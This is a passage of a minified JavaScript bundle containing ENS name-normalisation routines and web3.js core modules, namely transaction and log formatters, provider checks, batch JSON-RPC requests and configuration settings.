                ]), Y = o(h), Z = function e(t) {
                    let r = u(()=>{
                        let t = o(h).map((e)=>Y[e]);
                        if (t.length) return e(t);
                    }).sort((e, t)=>t.Q.size - e.Q.size), n = h(), i = n % 3;
                    n = n / 3 | 0;
                    let s = 1 & n;
                    return n >>= 1, {
                        B: r,
                        V: i,
                        F: s,
                        S: 1 & n,
                        C: 2 & n,
                        Q: new Set(t)
                    };
                }([]);
                class $ extends Array {
                    get is_emoji() {
                        return !0;
                    }
                }
                function ee(e, t = p) {
                    let r = [];
                    ne(e[0]) && r.push("◌");
                    let n = 0, i = e.length;
                    for(let o = 0; o < i; o++){
                        let i = e[o];
                        ie(i) && (r.push(g(e.slice(n, o))), r.push(t(i)), n = o + 1);
                    }
                    return r.push(g(e.slice(n, i))), r.join("");
                }
                function te(e) {
                    return (ie(e) ? "" : `"${ee([
                        e
                    ])}" `) + p(e);
                }
                function re(e) {
                    for(let t = e.lastIndexOf(95); t > 0;)if (95 !== e[--t]) throw new Error("underscore allowed only at start");
                }
                function ne(e) {
                    return j.has(e);
                }
                function ie(e) {
                    return U.has(e);
                }
                function oe(e, t) {
                    let r = 0;
                    return e.split(k).map((e)=>{
                        let n, i = m(e), o = {
                            input: i,
                            offset: r
                        };
                        r += i.length + 1;
                        try {
                            let e, r = o.tokens = le(i, N), s = r.length;
                            if (!s) throw new Error("empty label");
                            {
                                let i = r[0], a = s > 1 || i.is_emoji;
                                if (!a && i.every((e)=>e < 128)) n = i, re(n), function(e) {
                                    if (e.length >= 4 && 45 == e[2] && 45 == e[3]) throw new Error("invalid label extension");
                                }(n), e = "ASCII";
                                else if (a && (o.emoji = !0, i = r.flatMap((e)=>e.is_emoji ? [] : e)), n = r.flatMap((e)=>!t && e.is_emoji ? de(e) : e), re(n), i.length) {
                                    if (j.has(n[0])) throw ce("leading combining mark");
                                    for(let e = 1; e < s; e++){
                                        let t = r[e];
                                        if (!t.is_emoji && j.has(t[0])) throw ce(`emoji + combining mark: "${g(r[e - 1])} + ${ee([
                                            t[0]
                                        ])}"`);
                                    }
                                    !function(e) {
                                        let t = e[0], r = f.get(t);
                                        if (r) throw ce(`leading ${r}`);
                                        let n = e.length, i = -1;
                                        for(let o = 1; o < n; o++){
                                            t = e[o];
                                            let n = f.get(t);
                                            if (n) {
                                                if (i == o) throw ce(`${r} + ${n}`);
                                                i = o + 1, r = n;
                                            }
                                        }
                                        if (i == n) throw ce(`trailing ${r}`);
                                    }(n);
                                    let t = [
                                        ...new Set(i)
                                    ], [o] = function(e) {
                                        let t = q;
                                        for (let r of e){
                                            let e = t.filter((e)=>e.V.has(r));
                                            if (!e.length) throw t === q ? ae(r) : ue(t[0], r);
                                            if (t = e, 1 == e.length) break;
                                        }
                                        return t;
                                    }(t);
                                    !function(e, t) {
                                        let { V: r, M: n } = e;
                                        for (let n of t)if (!r.has(n)) throw ue(e, n);
                                        if (n >= 0) {
                                            for(let r = 1, i = B(t).length; r < i; r++)if (j.has(t[r])) {
                                                let o = r + 1;
                                                for(; o < i && j.has(t[o]);)o++;
                                                if (o - r > n) throw new Error(`too many combining marks: ${e.N} "${g(t.slice(r - 1, o))}" (${o - r}/${n})`);
                                                r = o;
                                            }
                                        }
                                    }(o, i), function(e, t) {
                                        let r, n = [];
                                        for (let e of t){
                                            let t = Q.get(e);
                                            if (1 === t) return;
                                            if (t) {
                                                let n = t.M.get(e);
                                                if (r = r ? r.filter((e)=>n.has(e)) : [
                                                    ...n
                                                ], !r.length) return;
                                            } else n.push(e);
                                        }
                                        if (r) {
                                            for (let t of r)if (n.every((e)=>t.V.has(e))) throw new Error(`whole-script confusable: ${e.N}/${t.N}`);
                                        }
                                    }(o, t), e = o.N;
                                } else e = "Emoji";
                            }
                            o.type = e;
                        } catch (e) {
                            o.error = e;
                        }
                        return o.output = n, o;
                    });
                }
                function se(e) {
                    return e.map(({ input: t, error: r, output: n })=>{
                        if (r) {
                            let n = r.message;
                            throw new Error(1 == e.length ? n : `Invalid label "${ee(t)}": ${n}`);
                        }
                        return g(n);
                    }).join(k);
                }
                function ae(e) {
                    return new Error(`disallowed character: ${te(e)}`);
                }
                function ue(e, t) {
                    let r = te(t), n = q.find((e)=>e.P.has(t));
                    return n && (r = `${n.N} ${r}`), new Error(`illegal mixture: ${e.N} + ${r}`);
                }
                function ce(e) {
                    return new Error(`illegal placement: ${e}`);
                }
                function le(e, t) {
                    let r = [], n = [];
                    for(e = e.slice().reverse(); e.length;){
                        let i = he(e);
                        if (i) n.length && (r.push(t(n)), n = []), r.push(i);
                        else {
                            let t = e.pop();
                            if (X.has(t)) n.push(t);
                            else {
                                let e = F.get(t);
                                if (e) n.push(...e);
                                else if (!D.has(t)) throw ae(t);
                            }
                        }
                    }
                    return n.length && r.push(t(n)), r;
                }
                function de(e) {
                    return e.filter((e)=>e != C);
                }
                function he(e, t) {
                    let r, n, i = Z, o = [], s = e.length;
                    for(t && (t.length = 0); s;){
                        let a = e[--s];
                        if (i = i.B.find((e)=>e.Q.has(a)), !i) break;
                        if (i.S) n = a;
                        else if (i.C && a === n) break;
                        o.push(a), i.F && (o.push(C), s > 0 && e[s - 1] == C && s--), i.V && (r = fe(o, i), t && t.push(...e.slice(s).reverse()), e.length = s);
                    }
                    return r;
                }
                function fe(e, t) {
                    let r = $.from(e);
                    return 2 == t.V && r.splice(1, 1), r;
                }
                const pe = "valid", me = "mapped", ge = "ignored";
                function ye(e) {
                    return e == pe || e == me;
                }
                function ve(e) {
                    return e.some((e)=>H.has(e));
                }
                function be(e) {
                    for(let t = 0; t < e.length; t++)if (e[t].type == pe) {
                        let r = t + 1;
                        for(; r < e.length && e[r].type == pe;)r++;
                        e.splice(t, r - t, {
                            type: pe,
                            cps: e.slice(t, r).flatMap((e)=>e.cps)
                        });
                    }
                    return e;
                }
                t.ens_beautify = function(e) {
                    let t = oe(e, !0);
                    for (let { type: e, output: r, error: n } of t)if (!n && "Greek" !== e) {
                        let e = 0;
                        for(;;){
                            let t = r.indexOf(958, e);
                            if (t < 0) break;
                            r[t] = 926, e = t + 1;
                        }
                    }
                    return se(t);
                }, t.ens_emoji = function() {
                    let e = [];
                    return function t(r, n, i) {
                        if (r.S) i = n[n.length - 1];
                        else if (r.C && i === n[n.length - 1]) return;
                        r.F && n.push(C), r.V && e.push(fe(n, r));
                        for (let e of r.B)for (let r of e.Q)t(e, [
                            ...n,
                            r
                        ], i);
                    }(Z, []), e.sort(y);
                }, t.ens_normalize = function(e) {
                    return se(oe(e));
                }, t.ens_normalize_fragment = function(e, t) {
                    let r = t ? B : N;
                    return e.split(k).map((e)=>g(le(m(e), r).flatMap((e)=>e.is_emoji ? de(e) : e))).join(k);
                }, t.ens_split = oe, t.ens_tokenize = function e(t, { nf: r = !0 } = {}) {
                    let n = m(t).reverse(), i = [], o = [];
                    for(; n.length;){
                        let e = he(n, i);
                        if (e) o.push({
                            type: "emoji",
                            emoji: e,
                            input: i.slice(),
                            cps: de(e)
                        });
                        else {
                            let e = n.pop();
                            if (46 == e) o.push({
                                type: "stop",
                                cp: e
                            });
                            else if (X.has(e)) o.push({
                                type: pe,
                                cps: [
                                    e
                                ]
                            });
                            else if (D.has(e)) o.push({
                                type: ge,
                                cp: e
                            });
                            else {
                                let t = F.get(e);
                                t ? o.push({
                                    type: me,
                                    cp: e,
                                    cps: t.slice()
                                }) : o.push({
                                    type: "disallowed",
                                    cp: e
                                });
                            }
                        }
                    }
                    if (r) for(let t = 0, r = -1; t < o.length; t++){
                        let n = o[t];
                        if (ye(n.type)) {
                            if (ve(n.cps)) {
                                let n = t + 1;
                                for(let e = n; e < o.length; e++){
                                    let { type: t, cps: r } = o[e];
                                    if (ye(t)) {
                                        if (!ve(r)) break;
                                        n = e + 1;
                                    } else if (t !== ge) break;
                                }
                                r < 0 && (r = t);
                                let i = o.slice(r, n), s = i.flatMap((e)=>ye(e.type) ? e.cps : []), a = N(s);
                                y(a, s) ? (o.splice(r, n - r, {
                                    type: "nfc",
                                    input: s,
                                    cps: a,
                                    tokens0: be(i),
                                    tokens: e(g(a), {
                                        nf: !1
                                    })
                                }), t = r) : t = n - 1, r = -1;
                            } else r = t;
                        } else n.type !== ge && (r = -1);
                    }
                    return be(o);
                }, t.is_combining_mark = ne, t.nfc = N, t.nfd = B, t.safe_str_from_cps = ee, t.should_escape = ie;
            },
            2191: (e, t, r)=>{
                "use strict";
                var n = [
                    "BigInt64Array",
                    "BigUint64Array",
                    "Float32Array",
                    "Float64Array",
                    "Int16Array",
                    "Int32Array",
                    "Int8Array",
                    "Uint16Array",
                    "Uint32Array",
                    "Uint8Array",
                    "Uint8ClampedArray"
                ], i = "undefined" == typeof globalThis ? r.g : globalThis;
                e.exports = function() {
                    for(var e = [], t = 0; t < n.length; t++)"function" == typeof i[n[t]] && (e[e.length] = n[t]);
                    return e;
                };
            },
            9765: (e, t, r)=>{
                "use strict";
                var n = r(7286)("%Object.getOwnPropertyDescriptor%", !0);
                if (n) try {
                    n([], "length");
                } catch (e) {
                    n = null;
                }
                e.exports = n;
            },
            1732: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.outputSyncingFormatter = t.outputPostFormatter = t.inputPostFormatter = t.outputBlockFormatter = t.outputTransactionReceiptFormatter = t.outputLogFormatter = t.inputLogFormatter = t.inputTopicFormatter = t.outputTransactionFormatter = t.inputSignFormatter = t.inputTransactionFormatter = t.inputCallFormatter = t.txInputOptionsFormatter = t.inputAddressFormatter = t.inputDefaultBlockNumberFormatter = t.inputBlockNumberFormatter = t.outputBigIntegerFormatter = t.outputProofFormatter = t.inputStorageKeysFormatter = void 0;
                const n = r(5071), i = r(9910), o = r(9970), s = r(9634), a = r(7345);
                t.inputStorageKeysFormatter = (e)=>e.map((e)=>(0, s.numberToHex)(e)), t.outputProofFormatter = (e)=>({
                        address: (0, s.toChecksumAddress)(e.address),
                        nonce: (0, s.hexToNumberString)(e.nonce),
                        balance: (0, s.hexToNumberString)(e.balance)
                    }), t.outputBigIntegerFormatter = (e)=>(0, s.toNumber)(e), t.inputBlockNumberFormatter = (e)=>{
                    if (!(0, a.isNullish)(e)) return "string" == typeof e && (0, a.isBlockTag)(e) ? e : "genesis" === e ? "0x0" : "string" == typeof e && (0, s.isHexStrict)(e) ? e.toLowerCase() : (0, s.numberToHex)(e);
                }, t.inputDefaultBlockNumberFormatter = (e, r)=>e ? (0, t.inputBlockNumberFormatter)(e) : (0, t.inputBlockNumberFormatter)(r), t.inputAddressFormatter = (e)=>{
                    if (i.Iban.isValid(e) && i.Iban.isDirect(e)) return new i.Iban(e).toAddress().toLowerCase();
                    if ((0, s.isAddress)(e)) return `0x${e.toLowerCase().replace("0x", "")}`;
                    throw new n.FormatterError(`Provided address ${e} is invalid, the capitalization checksum test failed, or it's an indirect IBAN address which can't be converted.`);
                }, t.txInputOptionsFormatter = (e)=>{
                    var r;
                    const i = Object.assign({}, e);
                    if (e.to && (i.to = (0, t.inputAddressFormatter)(e.to)), e.data && e.input) throw new n.FormatterError('You can\'t have "data" and "input" as properties of transactions at the same time, please use either "data" or "input" instead.');
                    if (!e.input && e.data && (i.input = e.data, delete i.data), e.input && !e.input.startsWith("0x") && (i.input = `0x${e.input}`), i.input && !(0, s.isHexStrict)(i.input)) throw new n.FormatterError("The input field must be HEX encoded data.");
                    return (e.gas || e.gasLimit) && (i.gas = (0, s.toNumber)(null !== (r = e.gas) && void 0 !== r ? r : e.gasLimit)), (e.maxPriorityFeePerGas || e.maxFeePerGas) && delete i.gasPrice, [
                        "gasPrice",
                        "gas",
                        "value",
                        "maxPriorityFeePerGas",
                        "maxFeePerGas",
                        "nonce",
                        "chainId"
                    ].filter((e)=>!(0, a.isNullish)(i[e])).forEach((e)=>{
                        i[e] = (0, s.numberToHex)(i[e]);
                    }), i;
                }, t.inputCallFormatter = (e, r)=>{
                    var n;
                    const i = (0, t.txInputOptionsFormatter)(e), o = null !== (n = i.from) && void 0 !== n ? n : r;
                    return o && (i.from = (0, t.inputAddressFormatter)(o)), i;
                }, t.inputTransactionFormatter = (e, r)=>{
                    var i;
                    const o = (0, t.txInputOptionsFormatter)(e);
                    if ("number" != typeof o.from && (!o.from || "object" != typeof o.from)) {
                        if (o.from = null !== (i = o.from) && void 0 !== i ? i : r, !e.from && "number" != typeof e.from) throw new n.FormatterError('The send transactions "from" field must be defined!');
                        o.from = (0, t.inputAddressFormatter)(e.from);
                    }
                    return o;
                }, t.inputSignFormatter = (e)=>(0, s.isHexStrict)(e) ? e : (0, s.utf8ToHex)(e), t.outputTransactionFormatter = (e)=>{
                    const r = Object.assign({}, e);
                    return e.blockNumber && (r.blockNumber = (0, s.hexToNumber)(e.blockNumber)), e.transactionIndex && (r.transactionIndex = (0, s.hexToNumber)(e.transactionIndex)), r.nonce = (0, s.hexToNumber)(e.nonce), r.gas = (0, s.hexToNumber)(e.gas), e.gasPrice && (r.gasPrice = (0, t.outputBigIntegerFormatter)(e.gasPrice)), e.maxFeePerGas && (r.maxFeePerGas = (0, t.outputBigIntegerFormatter)(e.maxFeePerGas)), e.maxPriorityFeePerGas && (r.maxPriorityFeePerGas = (0, t.outputBigIntegerFormatter)(e.maxPriorityFeePerGas)), e.type && (r.type = (0, s.hexToNumber)(e.type)), r.value = (0, t.outputBigIntegerFormatter)(e.value), e.to && (0, s.isAddress)(e.to) ? r.to = (0, s.toChecksumAddress)(e.to) : r.to = void 0, e.from && (r.from = (0, s.toChecksumAddress)(e.from)), r;
                }, t.inputTopicFormatter = (e)=>{
                    if ((0, a.isNullish)(e)) return null;
                    const t = String(e);
                    return (0, a.isHex)(t) ? t : (0, s.fromUtf8)(t);
                }, t.inputLogFormatter = (e)=>{
                    var r;
                    const n = (0, a.isNullish)(e) ? {} : (0, s.mergeDeep)({}, e);
                    return (0, a.isNullish)(n.fromBlock) && (n.fromBlock = o.BlockTags.LATEST), n.fromBlock = (0, t.inputBlockNumberFormatter)(n.fromBlock), (0, a.isNullish)(n.toBlock) || (n.toBlock = (0, t.inputBlockNumberFormatter)(n.toBlock)), n.topics = null !== (r = n.topics) && void 0 !== r ? r : [], n.topics = n.topics.map((e)=>Array.isArray(e) ? e.map(t.inputTopicFormatter) : (0, t.inputTopicFormatter)(e)), n.address && (n.address = Array.isArray(n.address) ? n.address.map((e)=>(0, t.inputAddressFormatter)(e)) : (0, t.inputAddressFormatter)(n.address)), n;
                }, t.outputLogFormatter = (e)=>{
                    const t = Object.assign({}, e), r = "string" == typeof e.logIndex ? e.logIndex : (0, s.numberToHex)(e.logIndex);
                    if ("string" == typeof e.blockHash && "string" == typeof e.transactionHash) {
                        const n = (0, s.sha3Raw)(`${e.blockHash.replace("0x", "")}${e.transactionHash.replace("0x", "")}${r.replace("0x", "")}`);
                        t.id = `log_${n.replace("0x", "").slice(0, 8)}`;
                    } else e.id || (t.id = void 0);
                    return e.blockNumber && (0, s.isHexStrict)(e.blockNumber) && (t.blockNumber = (0, s.hexToNumber)(e.blockNumber)), e.transactionIndex && (0, s.isHexStrict)(e.transactionIndex) && (t.transactionIndex = (0, s.hexToNumber)(e.transactionIndex)), e.logIndex && (0, s.isHexStrict)(e.logIndex) && (t.logIndex = (0, s.hexToNumber)(e.logIndex)), e.address && (t.address = (0, s.toChecksumAddress)(e.address)), t;
                }, t.outputTransactionReceiptFormatter = (e)=>{
                    if ("object" != typeof e) throw new n.FormatterError(`Received receipt is invalid: ${String(e)}`);
                    const r = Object.assign({}, e);
                    return e.blockNumber && (r.blockNumber = (0, s.hexToNumber)(e.blockNumber)), e.transactionIndex && (r.transactionIndex = (0, s.hexToNumber)(e.transactionIndex)), r.cumulativeGasUsed = (0, s.hexToNumber)(e.cumulativeGasUsed), r.gasUsed = (0, s.hexToNumber)(e.gasUsed), e.logs && Array.isArray(e.logs) && (r.logs = e.logs.map(t.outputLogFormatter)), e.effectiveGasPrice && (r.effectiveGasPrice = (0, s.hexToNumber)(e.effectiveGasPrice)), e.contractAddress && (r.contractAddress = (0, s.toChecksumAddress)(e.contractAddress)), e.status && (r.status = Boolean(parseInt(e.status, 10))), r;
                }, t.outputBlockFormatter = (e)=>{
                    const r = Object.assign({}, e);
                    return r.gasLimit = (0, s.hexToNumber)(e.gasLimit), r.gasUsed = (0, s.hexToNumber)(e.gasUsed), r.size = (0, s.hexToNumber)(e.size), r.timestamp = (0, s.hexToNumber)(e.timestamp), e.number && (r.number = (0, s.hexToNumber)(e.number)), e.difficulty && (r.difficulty = (0, t.outputBigIntegerFormatter)(e.difficulty)), e.totalDifficulty && (r.totalDifficulty = (0, t.outputBigIntegerFormatter)(e.totalDifficulty)), e.transactions && Array.isArray(e.transactions) && (r.transactions = e.transactions.map(t.outputTransactionFormatter)), e.miner && (r.miner = (0, s.toChecksumAddress)(e.miner)), e.baseFeePerGas && (r.baseFeePerGas = (0, s.hexToNumber)(e.baseFeePerGas)), r;
                }, t.inputPostFormatter = (e)=>{
                    var t;
                    const r = Object.assign({}, e);
                    return e.ttl && (r.ttl = (0, s.numberToHex)(e.ttl)), e.workToProve && (r.workToProve = (0, s.numberToHex)(e.workToProve)), e.priority && (r.priority = (0, s.numberToHex)(e.priority)), e.topics && !Array.isArray(e.topics) && (r.topics = e.topics ? [
                        e.topics
                    ] : []), r.topics = null === (t = r.topics) || void 0 === t ? void 0 : t.map((e)=>e.startsWith("0x") ? e : (0, s.fromUtf8)(e)), r;
                }, t.outputPostFormatter = (e)=>{
                    var t;
                    const r = Object.assign({}, e);
                    return e.expiry && (r.expiry = (0, s.hexToNumber)(e.expiry)), e.sent && (r.sent = (0, s.hexToNumber)(e.sent)), e.ttl && (r.ttl = (0, s.hexToNumber)(e.ttl)), e.workProved && (r.workProved = (0, s.hexToNumber)(e.workProved)), e.topics || (r.topics = []), r.topics = null === (t = r.topics) || void 0 === t ? void 0 : t.map(s.toUtf8), r;
                }, t.outputSyncingFormatter = (e)=>{
                    const t = Object.assign({}, e);
                    return t.startingBlock = (0, s.hexToNumber)(e.startingBlock), t.currentBlock = (0, s.hexToNumber)(e.currentBlock), t.highestBlock = (0, s.hexToNumber)(e.highestBlock), e.knownStates && (t.knownStates = (0, s.hexToNumber)(e.knownStates)), e.pulledStates && (t.pulledStates = (0, s.hexToNumber)(e.pulledStates)), t;
                };
            },
            6527: function(e, t, r) {
                "use strict";
                var n = this && this.__createBinding || (Object.create ? function(e, t, r, n) {
                    void 0 === n && (n = r);
                    var i = Object.getOwnPropertyDescriptor(t, r);
                    i && !("get" in i ? !t.__esModule : i.writable || i.configurable) || (i = {
                        enumerable: !0,
                        get: function() {
                            return t[r];
                        }
                    }), Object.defineProperty(e, n, i);
                } : function(e, t, r, n) {
                    void 0 === n && (n = r), e[n] = t[r];
                }), i = this && this.__setModuleDefault || (Object.create ? function(e, t) {
                    Object.defineProperty(e, "default", {
                        enumerable: !0,
                        value: t
                    });
                } : function(e, t) {
                    e.default = t;
                }), o = this && this.__exportStar || function(e, t) {
                    for(var r in e)"default" === r || Object.prototype.hasOwnProperty.call(t, r) || n(t, e, r);
                }, s = this && this.__importStar || function(e) {
                    if (e && e.__esModule) return e;
                    var t = {};
                    if (null != e) for(var r in e)"default" !== r && Object.prototype.hasOwnProperty.call(e, r) && n(t, e, r);
                    return i(t, e), t;
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.formatters = void 0, o(r(6171), t), o(r(8441), t), o(r(860), t), o(r(1819), t), o(r(8174), t), o(r(8202), t), o(r(7003), t), o(r(8165), t), o(r(1732), t), o(r(4738), t), o(r(8976), t), t.formatters = s(r(1732));
            },
            8165: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                });
            },
            7003: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.isSupportSubscriptions = t.isSupportedProvider = t.isLegacySendAsyncProvider = t.isLegacySendProvider = t.isEIP1193Provider = t.isLegacyRequestProvider = t.isWeb3Provider = void 0;
                const n = r(9970);
                t.isWeb3Provider = (e)=>n.Web3BaseProvider.isWeb3Provider(e), t.isLegacyRequestProvider = (e)=>"string" != typeof e && "request" in e && "Function" === e.request.constructor.name, t.isEIP1193Provider = (e)=>"string" != typeof e && "request" in e && "AsyncFunction" === e.request.constructor.name, t.isLegacySendProvider = (e)=>"string" != typeof e && "send" in e, t.isLegacySendAsyncProvider = (e)=>"string" != typeof e && "sendAsync" in e, t.isSupportedProvider = (e)=>(0, t.isWeb3Provider)(e) || (0, t.isEIP1193Provider)(e) || (0, t.isLegacyRequestProvider)(e) || (0, t.isLegacySendAsyncProvider)(e) || (0, t.isLegacySendProvider)(e), t.isSupportSubscriptions = (e)=>(0, t.isWeb3Provider)(e) ? e.supportsSubscriptions() : "string" != typeof e && "on" in e;
            },
            8202: function(e, t, r) {
                "use strict";
                var n = this && this.__awaiter || function(e, t, r, n) {
                    return new (r || (r = Promise))(function(i, o) {
                        function s(e) {
                            try {
                                u(n.next(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function a(e) {
                            try {
                                u(n.throw(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function u(e) {
                            var t;
                            e.done ? i(e.value) : (t = e.value, t instanceof r ? t : new r(function(e) {
                                e(t);
                            })).then(s, a);
                        }
                        u((n = n.apply(e, t || [])).next());
                    });
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.Web3BatchRequest = t.DEFAULT_BATCH_REQUEST_TIMEOUT = void 0;
                const i = r(9634), o = r(5071);
                t.DEFAULT_BATCH_REQUEST_TIMEOUT = 1e3, t.Web3BatchRequest = class {
                    constructor(e){
                        this._requestManager = e, this._requests = new Map;
                    }
                    get requests() {
                        return [
                            ...this._requests.values()
                        ].map((e)=>e.payload);
                    }
                    add(e) {
                        const t = i.jsonRpc.toPayload(e), r = new i.Web3DeferredPromise;
                        return this._requests.set(t.id, {
                            payload: t,
                            promise: r
                        }), r;
                    }
                    execute() {
                        return n(this, void 0, void 0, function*() {
                            if (0 === this.requests.length) return Promise.resolve([]);
                            const e = new i.Web3DeferredPromise({
                                timeout: t.DEFAULT_BATCH_REQUEST_TIMEOUT,
                                eagerStart: !0,
                                timeoutMessage: "Batch request timeout"
                            });
                            return this._processBatchRequest(e).catch((t)=>e.reject(t)), e.catch((t)=>{
                                t instanceof o.OperationTimeoutError && this._abortAllRequests("Batch request timeout"), e.reject(t);
                            }), e;
                        });
                    }
                    _processBatchRequest(e) {
                        var t, r;
                        return n(this, void 0, void 0, function*() {
                            const n = yield this._requestManager.sendBatch([
                                ...this._requests.values()
                            ].map((e)=>e.payload));
                            if (n.length !== this._requests.size) throw this._abortAllRequests("Invalid batch response"), new o.ResponseError(n, `Batch request size mismatch the results size. Requests: ${this._requests.size}, Responses: ${n.length}`);
                            const s = this.requests.map((e)=>e.id).map(Number).sort((e, t)=>e - t), a = n.map((e)=>e.id).map(Number).sort((e, t)=>e - t);
                            if (JSON.stringify(s) !== JSON.stringify(a)) throw this._abortAllRequests("Invalid batch response"), new o.ResponseError(n, `Batch request mismatch the results. Requests: [${s.join()}], Responses: [${a.join()}]`);
                            for (const e of n)i.jsonRpc.isResponseWithResult(e) ? null === (t = this._requests.get(e.id)) || void 0 === t || t.promise.resolve(e.result) : i.jsonRpc.isResponseWithError(e) && (null === (r = this._requests.get(e.id)) || void 0 === r || r.promise.reject(e.error));
                            e.resolve(n);
                        });
                    }
                    _abortAllRequests(e) {
                        for (const { promise: t } of this._requests.values())t.reject(new o.OperationAbortError(e));
                    }
                };
            },
            6171: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.Web3Config = t.Web3ConfigEvent = void 0;
                const n = r(5071), i = r(9634), o = r(8976);
                var s;
                !function(e) {
                    e.CONFIG_CHANGE = "CONFIG_CHANGE";
                }(s = t.Web3ConfigEvent || (t.Web3ConfigEvent = {}));
                class a extends o.Web3EventEmitter {
                    constructor(e){
                        super(), this.config = {
                            handleRevert: !1,
                            defaultAccount: void 0,
                            defaultBlock: "latest",
                            transactionBlockTimeout: 50,
                            transactionConfirmationBlocks: 24,
                            transactionPollingInterval: 1e3,
                            transactionPollingTimeout: 75e4,
                            transactionReceiptPollingInterval: void 0,
                            transactionSendTimeout: 75e4,
                            transactionConfirmationPollingInterval: void 0,
                            blockHeaderTimeout: 10,
                            maxListenersWarningThreshold: 100,
                            defaultNetworkId: void 0,
                            defaultChain: "mainnet",
                            defaultHardfork: "london",
                            defaultCommon: void 0,
                            defaultTransactionType: "0x0",
                            defaultMaxPriorityFeePerGas: (0, i.toHex)(25e8),
                            enableExperimentalFeatures: {
                                useSubscriptionWhenCheckingBlockTimeout: !1,
                                useRpcCallSpecification: !1
                            },
                            transactionBuilder: void 0,
                            transactionTypeParser: void 0
                        }, this.setConfig(null != e ? e : {});
                    }
                    setConfig(e) {
                        Object.assign(this.config, e);
                    }
                    get handleRevert() {
                        return this.config.handleRevert;
                    }
                    set handleRevert(e) {
                        this._triggerConfigChange("handleRevert", e), this.config.handleRevert = e;
                    }
                    get defaultAccount() {
                        return this.config.defaultAccount;
                    }
                    set defaultAccount(e) {
                        this._triggerConfigChange("defaultAccount", e), this.config.defaultAccount = e;
                    }
                    get defaultBlock() {
                        return this.config.defaultBlock;
                    }
                    set defaultBlock(e) {
                        this._triggerConfigChange("defaultBlock", e), this.config.defaultBlock = e;
                    }
                    get transactionSendTimeout() {
                        return this.config.transactionSendTimeout;
                    }
                    set transactionSendTimeout(e) {
                        this._triggerConfigChange("transactionSendTimeout", e), this.config.transactionSendTimeout = e;
                    }
                    get transactionBlockTimeout() {
                        return this.config.transactionBlockTimeout;
                    }
                    set transactionBlockTimeout(e) {
                        this._triggerConfigChange("transactionBlockTimeout", e), this.config.transactionBlockTimeout = e;
                    }
                    get transactionConfirmationBlocks() {
                        return this.config.transactionConfirmationBlocks;
                    }
                    set transactionConfirmationBlocks(e) {
                        this._triggerConfigChange("transactionConfirmationBlocks", e), this.config.transactionConfirmationBlocks = e;
                    }
                    get transactionPollingInterval() {
                        return this.config.transactionPollingInterval;
                    }
                    set transactionPollingInterval(e) {
                        this._triggerConfigChange("transactionPollingInterval", e), this.config.transactionPollingInterval = e, this.transactionReceiptPollingInterval = e, this.transactionConfirmationPollingInterval = e;
                    }
                    get transactionPollingTimeout() {
                        return this.config.transactionPollingTimeout;
                    }
                    set transactionPollingTimeout(e) {
                        this._triggerConfigChange("transactionPollingTimeout", e), this.config.transactionPollingTimeout = e;
                    }
                    get transactionReceiptPollingInterval() {
                        return this.config.transactionReceiptPollingInterval;
                    }
                    set transactionReceiptPollingInterval(e) {
                        this._triggerConfigChange("transactionReceiptPollingInterval", e), this.config.transactionReceiptPollingInterval = e;
                    }
                    get transactionConfirmationPollingInterval() {
                        return this.config.transactionConfirmationPollingInterval;
                    }
                    set transactionConfirmationPollingInterval(e) {
                        this._triggerConfigChange("transactionConfirmationPollingInterval", e), this.config.transactionConfirmationPollingInterval = e;
                    }
                    get blockHeaderTimeout() {
                        return this.config.blockHeaderTimeout;
                    }
                    set blockHeaderTimeout(e) {
                        this._triggerConfigChange("blockHeaderTimeout", e), this.config.blockHeaderTimeout = e;
                    }
                    get enableExperimentalFeatures() {
                        return this.config.enableExperimentalFeatures;
                    }
                    set enableExperimentalFeatures(e) {
                        this._triggerConfigChange("enableExperimentalFeatures", e), this.config.enableExperimentalFeatures = e;
                    }
                    get maxListenersWarningThreshold() {
                        return this.config.maxListenersWarningThreshold;
                    }
                    set maxListenersWarningThreshold(e) {
                        this._triggerConfigChange("maxListenersWarningThreshold", e), this.setMaxListenerWarningThreshold(e), this.config.maxListenersWarningThreshold = e;
                    }
                    get defaultNetworkId() {
                        return this.config.defaultNetworkId;
                    }
                    set defaultNetworkId(e) {
                        this._triggerConfigChange("defaultNetworkId", e), this.config.defaultNetworkId = e;
                    }
                    get defaultChain() {
                        return this.config.defaultChain;
                    }
                    set defaultChain(e) {
                        if (!(0, i.isNullish)(this.config.defaultCommon) && !(0, i.isNullish)(this.config.defaultCommon.baseChain) && e !== this.config.defaultCommon.baseChain) throw new n.ConfigChainMismatchError(this.config.defaultChain, e);
                        this._triggerConfigChange("defaultChain", e), this.config.defaultChain = e;
                    }
                    get defaultHardfork() {
                        return this.config.defaultHardfork;
                    }
                    set defaultHardfork(e) {
                        if (!(0, i.isNullish)(this.config.defaultCommon) && !(0, i.isNullish)(this.config.defaultCommon.hardfork) && e !== this.config.defaultCommon.hardfork) throw new n.ConfigHardforkMismatchError(this.config.defaultCommon.hardfork, e);
                        this._triggerConfigChange("defaultHardfork", e), this.config.defaultHardfork = e;
                    }
                    get defaultCommon() {
                        return this.config.defaultCommon;
                    }
                    set defaultCommon(e) {
                        if (!(0, i.isNullish)(this.config.defaultHardfork) && !(0, i.isNullish)(e) && !(0, i.isNullish)(e.hardfork) && this.config.defaultHardfork !== e.hardfork) throw new n.ConfigHardforkMismatchError(this.config.defaultHardfork, e.hardfork);
                        if (!(0, i.isNullish)(this.config.defaultChain) && !(0, i.isNullish)(e) && !(0, i.isNullish)(e.baseChain) && this.config.defaultChain !== e.baseChain) throw new n.ConfigChainMismatchError(this.config.defaultChain, e.baseChain);
                        this._triggerConfigChange("defaultCommon", e), this.config.defaultCommon = e;
                    }
                    get defaultTransactionType() {
                        return this.config.defaultTransactionType;
                    }
                    set defaultTransactionType(e) {
                        this._triggerConfigChange("defaultTransactionType", e), this.config.defaultTransactionType = e;
                    }
                    get defaultMaxPriorityFeePerGas() {
                        return this.config.defaultMaxPriorityFeePerGas;
                    }
                    set defaultMaxPriorityFeePerGas(e) {
